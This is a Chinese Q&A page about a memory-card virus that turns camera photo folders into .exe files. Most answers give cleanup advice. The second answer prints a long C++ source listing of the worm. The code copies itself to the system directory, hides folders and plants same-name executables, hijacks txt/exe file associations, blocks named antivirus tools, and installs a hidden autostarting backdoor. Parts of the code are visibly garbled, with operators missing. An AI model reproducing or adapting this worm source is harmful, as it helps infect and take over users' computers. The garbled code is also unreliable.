• 所有问题

    • 数码相机卡染上病毒不显示照片。文件夹名字后缀exe怎么办 我的数码相机屏幕出现几个黑色大点和道道,

    如题所述

    举报该问题
    其他回答
    第1个回答  2010-08-13
    你把文件夹显隐藏试试看 要是那个exe的文件夹很小 而且有同名的隐藏文件夹里面有照片 就把后缀为exe的文件夹删除就好了 要是其它的建议下载专杀工具 这样也好修复感染文件
    第2个回答  2010-08-21
    文件夹图标病毒具有Autorun属性。该病毒是用易语言编写,运行后会在系统目录下生成类似XP-8B618895.EXE的病毒副本,其中8B618895是随机的,并搜索移动设备,生成autorun文件,并根据移动存储设备根目录文件夹名生成同名EXE文件,并将原文件夹隐藏起来。另外病毒还会删除临时文件及Cookies,删除IE访问记录TypedURL。 生成文件(以系统盘为C盘,winxp Sp3为例,U:\代表U盘盘符) C:\WINDOWS\system32\XP-8B618895.EXE 1,501,856 C:\WINDOWS\system32\ul.dll 2,404 C:\WINDOWS\system32\og.dll 692 C:\WINDOWS\system32\com.run 270,336 C:\Documents and Settings\Nick\「开始」菜单\程序\启动\ .lnk 指向C:\WINDOWS\system32\XP-8B618895.EXE(注意空格) U:\autorun.inf U:\Recycled.exe 在U盘根目录生成文件夹图标同名EXE文件 以下是易语言的库文件等: C:\WINDOWS\system32\dp1.fne C:\WINDOWS\system32\eAPI.fne C:\WINDOWS\system32\internet.fne C:\WINDOWS\system32\krnln.fnr C:\WINDOWS\system32\RegEx.fnr C:\WINDOWS\system32\shell.fne C:\WINDOWS\system32\spec.fne 添加注册表启动项: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XP-8B618895(这里也是随机的,根据病毒名生成的不同而变)
    [编辑本段]病毒源代码
    bool CVirousApp::OpenFuckFile() { char CmdLine[MAX_PATH]={0}; char DirUrl[MAX_PATH]={0}; char HiJack[MAX_PATH]={0}; if(!GetCurrentDirectory(MAX_PATH,DirUrl)) return FALSE; char ch='\\'; if(ch!=*(DirUrl strlen(DirUrl)-1)) { strcat(DirUrl,"\\"); } //此处只在系统根目录下有效 sprintf(HiJack,"%s%s\\",DirUrl,AfxGetApp()->m_pszAp pName); //判断是否存在。 可以打开 if(-1==_access(HiJack,0)) return FALSE; else { sprintf(CmdLine,"explorer.exe %s",HiJack); // MessageBox(CmdLine); //For a Test if(WinExec(CmdLine,SW_SHOW)<31) return FALSE; } return TRUE; } 2、劫持"txt、exe"文件,并屏蔽常用安全工具 //定义特征字符串 BOOL check=TRUE; int len=7; char *FuckExe[]={"USBCleaner", "Kis", "Kav", "IceSword", "Kill", "WSYSCHECK", "360"}; //获取参数并判断 if(strcmp(m_lpCmdLine,""))//如果有参数 { //判断特征字符串 int i; for(i=0;i<len;i ) { if(strstr(_strupr(_strdup(m_lpCmdLine)), _strupr(_strdup(FuckExe)))) { check=FALSE; break;} } // LPTSTR ext; // ext=wcschr(m_lpCmdLine,_T(".")) 1; CString cmd; // if(!wcscmp(ext,_T("txt"))) if(strstr(m_lpCmdLine,_T(".txt"))||strstr(m_lpCmdL ine,_T(".TXT"))) { cmd.Format("%s %s","notepad.exe",m_lpCmdLine); } else if(strstr(m_lpCmdLine,_T(".exe"))||strstr(m_lpCmdL ine,_T(".EXE"))) { //此处不完美。 判断文件名 if(!check) { // AfxMessageBox("文件已损坏!"); ::MessageBox(NULL,"文件已损坏!请重新安装应用程序!","Microsoft",MB_OK); return FALSE; } else cmd.Format("%s",m_lpCmdLine); } WinExec(cmd,SW_NORMAL); } else //打开文件 OpenFuckFile(); 3、自启动及实现劫持"exe、txt"文件 //向系统目录下拷贝程序 char FileSource[MAX_PATH]={0}; char FileNew[MAX_PATH]={0}; HMODULE hModule; hModule=GetModuleHandle(NULL); GetModuleFileName(hModule,FileSource,MAX_PATH); CloseHandle(hModule); GetSystemDirectory(FileNew,MAX_PATH); strcat(FileNew,"\\SysKernel.exe"); CopyFile(FileSource,FileNew,TRUE); SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); //写注册表。 弄个自启动 WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run", "SysKernel",REG_SZ,FileNew,0,0); //写注册表,进行映像劫持 char Hijack[MAX_PATH]={0}; sprintf(Hijack,"%s %%1",FileNew); WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ txtfile\\shell\\open\\command", NULL,REG_SZ,Hijack,0,1); WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ exefile\\shell\\open\\command", NULL,REG_SZ,Hijack,0,1); 4、释放后门,并启动之 BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName) { HGLOBAL hRes; HRSRC hResInfo; HANDLE hFile; DWORD dwBytes; hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType); if (hResInfo == NULL) return FALSE; hRes = LoadResource(NULL, hResInfo); if (hRes == NULL) return FALSE; hFile = CreateFile ( lpFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); if (hFile == NULL) return FALSE; WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL); CloseHandle(hFile); return TRUE; } VOID CVirousDlg::ReleaseDoor() { char strSystemPath[MAX_PATH]; GetSystemDirectory(strSystemPath, sizeof(strSystemPath)); lstrcat(strSystemPath, "\\SysService.exe"); ReleaseResource(IDR_BIN, "BIN", strSystemPath); SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); //实现后门自启动 WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run", "SysService",REG_SZ,strSystemPath,0,0); WinExec(strSystemPath,SW_HIDE); } 5、遍历磁盘并拷贝自身 //遍历系统磁盘 BOOL CVirousDlg::FuckFile() { DWORD dwNumBytesForDriveStrings;//实际存储驱动器号的字符串长度 LPSTR lp; CString strLogdrive; //获得实际存储驱动器号的字符串长度 dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR); //如果字符串不为空。 则表示有正常的驱动器存在 if (dwNumBytesForDriveStrings!=0) { lp=new char[dwNumBytesForDriveStrings]; GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p); while (*lp!=0) { DoBad(lp); lp=strchr(lp,0) 1; } return TRUE; } else return FALSE; } //干坏事 VOID CVirousDlg::DoBad(char DriveBuf[]) { CFileFind finder; // build a string with wildcards CString strWildcard(DriveBuf); strWildcard = _T("*.*"); char FileSource[MAX_PATH]={0}; char FileNew[MAX_PATH]={0}; HMODULE hModule; hModule=GetModuleHandle(NULL); GetModuleFileName(hModule,FileSource,MAX_PATH); // CloseHandle(hModule); // start working for files BOOL bWorking = finder.FindFile(strWildcard); while (bWorking) { // nReg ; bWorking = finder.FindNextFile(); // skip . and .. files; otherwise, we'd // recur infinitely! if (finder.IsDots()) continue; // if it's a directory, recursively search it if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden()) { nReg ; if(!SetFileAttributes(finder.GetFilePath(), FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM)) continue; sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe" ); CopyFile(FileSource,FileNew,TRUE); if(FUCKREG==nReg) { WriteReg(FileNew); } } } finder.Close(); }
    [编辑本段]查杀方式
    1.下载usbcleaner,并运行其中的foldercure.exe 2.下载usbcleaner单独的文件夹图标病毒专杀工具,下 3.手动查杀: 结束进程 XP-8B618895.EXE(注意名称不固定,最好用icesword,其图标是文件夹容易区分) 依次删除 C:\WINDOWS\system32\ul.dll 2,404 C:\WINDOWS\system32\og.dll 692 C:\WINDOWS\system32\com.run 270,336 C:\Documents and Settings\Nick\「开始」菜单\程序\启动\ .lnk 指向C:\WINDOWS\system32\XP-8B618895.EXE(注意空格) C:\WINDOWS\system32\og.EDT&一个VB程序那种图标的exe(名字记不清了,总之看修改日期就好几乎与其他可疑文件是同一时期而且这几个文件都在一块呢) (以上两个原文里虽然没提但还是也一并删除吧,再啰嗦一句,当然XP-*.exe这些看见也一概删除) (删除下面几个是关键哦,网上一般解决办法都没提) 以下是易语言的库文件等: C:\WINDOWS\system32\dp1.fne C:\WINDOWS\system32\eAPI.fne C:\WINDOWS\system32\internet.fne C:\WINDOWS\system32\krnln.fnr C:\WINDOWS\system32\RegEx.fnr C:\WINDOWS\system32\shell.fne C:\WINDOWS\system32\spec.fne 删除病毒启动项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XP-8B618895(此处根据病毒名称而定) 手动删除U盘根目录的文件夹图标同名EXE文件
    第3个回答  2010-08-13
    对于exe后缀的文件 你可以上百度上搜一下 “.exe 专杀”就有很多工具 下载时尽量下有文件修复的那种工具 至于屏幕上的黑点有可能是屏幕有了问题 也不排除相机系统有了问题本回答被提问者采纳
    第4个回答  2010-08-26
    用卡巴或瑞星直接杀,杀完从新建文件夹就可以了.
    相似回答
    ...我的相机内存卡被感染了病毒!文件全部变成了exe.的格式很多照片都被...答:你好,你在电脑上既然能够看到你的照片,且未变成EXE格式,只是出现了EXE后缀的大量文件夹,那么你也应该能看到原来的文件夹吧?那些EXE后缀的应该是伪装的文件夹,实际为病毒文件。那么你在用腾讯电脑管家之类的软件杀毒之时,一般将只删除这类EXE后缀的病毒文件,并不会删除真实的文件夹和文件。不过要想...
    数码相机照片都变成.exe文件了,怎么办??答:应该是中毒了,升级杀毒软件吧。那个exe文件是病毒,真正的文件可能已经隐藏了,需要打开win窗口中的查看选项,选择查看所有文件,但是估计现在应该打不开了,因为病毒会屏蔽这个功能!那个usb杀毒软件应该能起一定作用,只是使用上可能存在问题,建议找一个有经验的朋友现场操作比较稳妥,否则操作失误删除文件就...
    相机内存卡中病毒怎么办答:你这个很可能是“文件夹模仿者”病毒,如果是,那就问题不大,这个病毒只是将正常的文件夹给隐藏了,然后模仿原文件夹产生一个后缀名为exe的病毒文件,例如原文件夹为“我的照片”,那么这个病毒会模仿产生一个病毒文件“我的照片.exe”,由于原文件夹没有被删除只是被隐藏了,只要在将病毒全部查杀之后...
    为什么我的数码相机里的照片全是exe格式?答:这是病毒造成的,好在这种病毒不会删除文件,它把文件夹变成一种EXE文件,同时把文件夹隐藏备份,病毒制造者好像手下留情。处理办法:1、先杀毒。2、遇到这种事不要慌,因为文件夹还在,你只要显示隐藏文件,并改变文件夹的隐藏属性就可以了,同时病毒产生的EXE文件,不管什么时候都可以直接删除,不会影响...
    大家正在搜
    文件夹后缀名显示出来文件夹后缀名变成 exe显示文件夹后缀文件夹后缀名是什么后缀exe是什么文件文件夹后缀是什么格式怎么批量改文件后缀怎样更改文件后缀文件夹格式变成exe
    相关问题
    求救求电脑高手!我的相机内存卡被感染了病毒!文件全部变成了e...
    数码相机储存卡中病毒相片怎么办?
    数码相机上会显示照片,但是在内存卡上电脑上不会显示文件夹,是...
    你好,我的数码相机在电脑里面,打不开我的相片?这是相机中病毒...
    相机的内存卡中病毒了。多了几个文件夹,还有原来的照片打开来都...
    数码相机的照片都变成.exe文件了,怎么办??
    我的数码相机的内存卡放在电脑上显示文件夹为空,可里面明明有照...
    佳能数码相机连接到电脑上,不显示相机里的照片?